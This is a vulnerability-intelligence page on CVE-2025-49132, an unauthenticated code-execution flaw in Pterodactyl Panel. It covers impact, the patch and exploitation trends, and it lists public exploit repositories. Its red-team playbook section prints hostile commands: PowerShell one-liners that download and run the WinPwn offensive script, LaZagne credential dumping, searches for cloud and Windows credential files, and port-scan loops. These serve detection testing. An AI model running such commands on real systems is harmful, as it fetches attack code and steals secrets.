CVE-2025-49132
Overview
This vulnerability is a remote code execution flaw caused by insecure handling of JSON locale files in the Pterodactyl Panel. The root cause lies in the improper validation and deserialization of user-supplied input via the /locales/locale.json endpoint, specifically through the locale and namespace query parameters. The affected component is the localization feature of the Pterodactyl Panel prior to version 1.11.11.
Vulnerability Description
Pterodactyl is a free, open-source game server management panel. Prior to version 1.11.11, using the /locales/locale.json with the locale and namespace query parameters, a malicious actor is able to execute arbitrary code without being authenticated. With the ability to execute arbitrary code it could be used to gain access to the Panel's server, read credentials from the Panel's config, extract sensitive information from the database, access files of servers managed by the panel, etc. This issue has been patched in version 1.11.11. There are no software workarounds for this vulnerability, but use of an external Web Application Firewall (WAF) could help mitigate this attack.
Impact
An unauthenticated attacker with network access to the Pterodactyl Panel can execute arbitrary code on the server, enabling them to access server files, read configuration credentials, and extract sensitive database information. This can lead to full compromise of the management panel and all game servers it controls. The vulnerability requires no user interaction and is exploitable remotely, as reflected by CVSS vector AV:N/AC:L/PR:N/UI:N, resulting in complete confidentiality, integrity, and availability loss (C:H/I:H/A:H).
Solution
Users must upgrade Pterodactyl Panel to version 1.11.11 or later, as detailed in the official security advisory GHSA-24wv-6c99-f843 and the release notes at https://github.com/pterodactyl/panel/releases/tag/v1.11.11. The patch addresses the unsafe deserialization vulnerability in the /locales/locale.json endpoint. No software workarounds are available; however, deploying an external Web Application Firewall (WAF) may provide temporary mitigation until the update is applied.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the game server management panel allows for the execution of arbitrary code due to improper handling of user input in the locale.json file. Specifically, the issue arises when the locale and namespace query parameters are utilized without sufficient validation or sanitization. This oversight enables an unauthenticated attacker to craft malicious requests that can manipulate the server's behavior. By exploiting this flaw, an attacker can execute arbitrary code on the server, leading to severe consequences, including unauthorized access to sensitive data and the potential for further system compromise.
Attack vectors for this vulnerability are particularly concerning due to the ease of exploitation. An attacker can leverage common web tools to send crafted requests to the affected panel, bypassing authentication mechanisms entirely. Once access is gained, the attacker can execute commands on the server, which may include reading sensitive configuration files that contain credentials, extracting data from the database, or even manipulating files associated with the game servers managed by the panel. The lack of authentication requirements significantly lowers the barrier to entry for potential attackers, making this vulnerability especially dangerous in environments where the panel is exposed to the internet.
The real-world impact of this vulnerability can be devastating for organizations that rely on the affected game server management panel. The ability to execute arbitrary code can lead to data breaches, loss of intellectual property, and significant reputational damage. For gaming companies, the exposure of user data or game configurations can result in a loss of player trust and potential legal ramifications. Moreover, the financial implications of remediation efforts, including incident response and system recovery, can be substantial. The critical nature of this vulnerability, reflected in its maximum CVSS score, underscores the urgent need for organizations to prioritize patching and securing their systems.
Detection and mitigation strategies are crucial in addressing this vulnerability. While the vendor has released a patch in version 1.11.11, organizations that have not yet upgraded are at significant risk. Implementing an external Web Application Firewall (WAF) can provide an additional layer of security by filtering out malicious requests before they reach the vulnerable application. Regular security assessments, including penetration testing and vulnerability scanning, can help identify and remediate such issues proactively. Furthermore, organizations should establish robust monitoring practices to detect unusual activity that may indicate exploitation attempts, thereby enabling a swift response to potential breaches.
In conclusion, the vulnerability within the game server management panel presents a critical risk to organizations utilizing this software. The ability for unauthenticated users to execute arbitrary code not only compromises the integrity of the server but also exposes sensitive data to potential theft or manipulation. Immediate action is required to patch the vulnerability and implement effective security measures to mitigate the risks associated with exploitation. By prioritizing security best practices and maintaining vigilance, organizations can better protect themselves against the evolving landscape of cyber threats.
CSURFACE threat intelligence has identified a marked escalation in the exploitation landscape of CVE-2025-49132, evidenced by a significant increase in the Exploit Prediction Scoring System (EPSS) score, now approaching the 0.18 threshold. This rise correlates with the emergence of several new proof-of-concept exploits and credential extraction scripts publicly available on code-sharing platforms, which lower the barrier to entry for threat actors seeking to leverage this unauthenticated remote code execution vulnerability. Our telemetry indicates a steady upward trend in exploit attempts, underscoring growing attacker interest and capability. This development amplifies the threat to organizations running vulnerable versions of the Pterodactyl panel, as adversaries can more readily compromise server integrity, exfiltrate sensitive data, and potentially pivot within affected environments. Consequently, the risk level for this vulnerability has intensified, warranting heightened vigilance given the expanding toolkit and increasing exploitation momentum documented by our sensors.
Update 2 — May 18, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2025-49132, highlighted by the emergence of new proof-of-concept exploits and expanded tooling accessible to threat actors. Although the EPSS score has slightly declined, this metric does not fully capture the increased operationalization and attacker interest reflected in our telemetry, which shows a sharp rise in detection events. The availability of detailed exploit walkthroughs and publicly accessible repositories lowers the barrier for adversaries to weaponize this vulnerability, increasing the likelihood of successful intrusions. This evolution in the exploit landscape significantly elevates the threat posture for organizations running vulnerable versions of the Pterodactyl panel, as attackers can more readily achieve remote code execution and subsequent privilege escalation. Consequently, the risk level associated with CVE-2025-49132 has intensified, underscoring the need for sustained monitoring and rapid response to emerging exploitation attempts.
Update 3 — July 29, 2026
CSURFACE threat intelligence has identified a significant shift in the exploitation landscape of CVE-2025-49132 with the emergence of a Metasploit module, which markedly lowers the technical barrier for adversaries to weaponize this critical vulnerability. Although our telemetry indicates a notable reduction in direct detection activity, the availability of this widely used exploitation framework, combined with a substantial increase in the Exploit Prediction Scoring System (EPSS) score, signals an elevated risk of opportunistic attacks. The EPSS score’s rapid rise to the 0.98th percentile reflects growing confidence in successful exploitation attempts, even as immediate exploitation volume appears subdued. This divergence suggests that threat actors may be preparing for broader campaigns or integrating the exploit into automated toolkits, increasing the potential for rapid, large-scale compromise. Consequently, the threat level associated with CVE-2025-49132 has intensified, underscoring a heightened likelihood of exploitation attempts that could lead to severe operational impact for organizations running vulnerable versions of the Pterodactyl panel.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Pterodactyl Panel CVE-2025-49132 Remote Code Execution
exploits/linux/http/pterodactyl_locales_locale_json
|
0xtensho, jheysel-r7 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE) | Zen-kun04 | webapps | multiple | - | View |
GitHub PoCs (34)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
YoyoChaud/CVE-2025-49132
Exploit for Pterodactyl Panel ≤ 1.11.10 - unauthenticated LFI to RCE.
|
YoyoChaud | 25 | 1 | 2026-02-08 | View |
|
Zen-kun04/CVE-2025-49132
A script that gives you the credentials of a Pterodactyl panel vulnerable to CVE-2025-49132
|
Zen-kun04 | 17 | 4 | 2025-06-22 | View |
|
malw0re/CVE-2025-49132-Mods
|
malw0re | 12 | 2 | 2026-02-08 | View |
|
63square/CVE-2025-49132
PoCs for CVE-2025-49132
|
63square | 5 | 2 | 2025-06-24 | View |
|
str1keboo/CVE-2025-49132
This repository contains a Proof of Concept (PoC) for CVE-2025-49132, a critical vulnerability in Pterodactyl Panel vers...
|
str1keboo | 4 | 0 | 2026-02-07 | View |
|
qiaojojo/CVE-2025-49132_poc
Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓
|
qiaojojo | 4 | 0 | 2025-06-23 | View |
|
popyue/CVE-2025-49132
CVE For Pterodactyl (For Study and Education)
|
popyue | 4 | 0 | 2026-02-16 | View |
|
rippsec/CVE-2025-49132-PHP-PEAR
CVE-2025-49132_PHP_PEAR_METHOD
|
rippsec | 3 | 1 | 2026-02-12 | View |
|
0xtensho/CVE-2025-49132-poc
|
0xtensho | 3 | 0 | 2025-07-08 | View |
|
dollarboysushil/CVE-2025-49132-Pterodactyl-Panel-Unauthenticated-Remote-Code-Execution-RCE-
PoC exploit for CVE-2025-49132 (GHSA-24wv-6c99-f843) – Unauthenticated Remote Code Execution in Pterodactyl Panel ≤ 1.11...
|
dollarboysushil | 3 | 0 | 2026-02-11 | View |
|
GRodolphe/CVE-2025-49132_poc
This is an improved version of the CVE-2025-49132 proof of concept exploit.
|
GRodolphe | 3 | 0 | 2025-08-18 | View |
|
pxxdrobits/CVE-2025-49132
Check a list of Pterodactyl panels for vulnerabilities from a file.
|
pxxdrobits | 2 | 0 | 2025-06-23 | View |
|
vimmwy/CVE-2025-49132
A script that gives you the credentials of a Pterodactyl panel vulnerable to CVE-2025-49132
|
vimmwy | 1 | 0 | 2026-06-16 | View |
|
symphony2colour/HTB-Pterodactyl-RCE-CVE-2025-49132
This repo contains RCE exploit for Pterodactyl htb machine
|
symphony2colour | 1 | 0 | 2026-02-09 | View |
|
Pwndalf/CVE-2025-49132-PoC
This script exploits Remote Code Execution vulnerability in Pterodactyl Panel < 1.11.11
|
Pwndalf | 1 | 0 | 2026-02-11 | View |
|
thealchimist86/CVE-2025-49132-Pterodactyl-Panel-RCE
Exploit CVE-2025-49132 Pterodactyl Panel RCE
|
thealchimist86 | 1 | 0 | 2026-02-12 | View |
|
nik123-py/CVE-2025-49132_HTB_SEASON10
|
nik123-py | 0 | 1 | 2026-02-14 | View |
|
ramzihafiz/CVE-2025-49132
|
ramzihafiz | 1 | 0 | 2026-02-08 | View |
|
matesz44/CVE-2025-49132
CVE-2025-49132: Pterodactyl Panel UnauthN LFI to RCE (w/ pearcmd) in posix sh
|
matesz44 | 1 | 0 | 2026-02-10 | View |
|
aleewyy/CVE-2025-49132
A script that gives you the credentials of a Pterodactyl panel vulnerable to CVE-2025-49132
|
aleewyy | 0 | 0 | 2026-06-16 | View |
|
yurahshell/CVE-2025-49132
|
yurahshell | 0 | 0 | 2026-06-05 | View |
|
unixskid/CVE-2025-49132-Pterodactyl-RCE
|
unixskid | 0 | 0 | 2026-02-25 | View |
|
karimelsheikh1/HTB-Pterodactyl-Writeup
HTB Season 10 - Pterodactyl machine writeup. Medium Linux box covering CVE-2025-49132 (Pterodactyl Panel RCE) and CVE-20...
|
karimelsheikh1 | 0 | 0 | 2026-04-24 | View |
|
V0idW1re/HTB-Pterodactyl-Writeup
HackTheBox — Pterodactyl (Medium/Linux) walkthrough. CVE-2025-49132 LFI → pearcmd RCE → bcrypt crack → SSH. Privesc via ...
|
V0idW1re | 0 | 0 | 2026-04-08 | View |
|
V0idW1re/htb-pterodactyl-writeup
HackTheBox — Pterodactyl (Medium/Linux) walkthrough. CVE-2025-49132 LFI → pearcmd RCE → bcrypt crack → SSH. Privesc via ...
|
V0idW1re | 0 | 0 | 2026-04-08 | View |
|
unixskid/CVE-2025-49132
|
unixskid | 0 | 0 | 2026-02-25 | View |
|
4nuxd/CVE-2025-49132
The flaw allows an attacker to execute arbitrary system commands on the server hosting the Pterodactyl Panel without any...
|
4nuxd | 0 | 0 | 2026-02-21 | View |
|
kerburenthusiasm/CVE-2025-49132-PoC
|
kerburenthusiasm | 0 | 0 | 2026-02-08 | View |
|
scroollocker/CVE-2025-49132
|
scroollocker | 0 | 0 | 2026-02-12 | View |
|
typicalsmc/CVE-2025-49132-PoC
|
typicalsmc | 0 | 0 | 2025-06-20 | View |
|
WebSafety-2tina/CVE-2025-49132
CVE-2025-49132
|
WebSafety-2tina | 0 | 0 | 2025-09-25 | View |
|
melonlonmeo/CVE-2025-49132
Poc - CVE-2025-49132
|
melonlonmeo | 0 | 0 | 2025-06-25 | View |
|
Ahmedf000/CVE-2025-49132_HTB_SEASON10
|
Ahmedf000 | 0 | 0 | 2026-02-11 | View |
|
revasec/CVE-2025-49132
|
revasec | 0 | 0 | 2026-02-25 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-49132 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/pterodactyl/panel/security/advisories/GHSA-24wv-6c99-f843 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/pterodactyl/panel/commit/24c82b0e335fb5d7a844226b08abf9f176e592f0 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/pterodactyl/panel/releases/tag/v1.11.11 |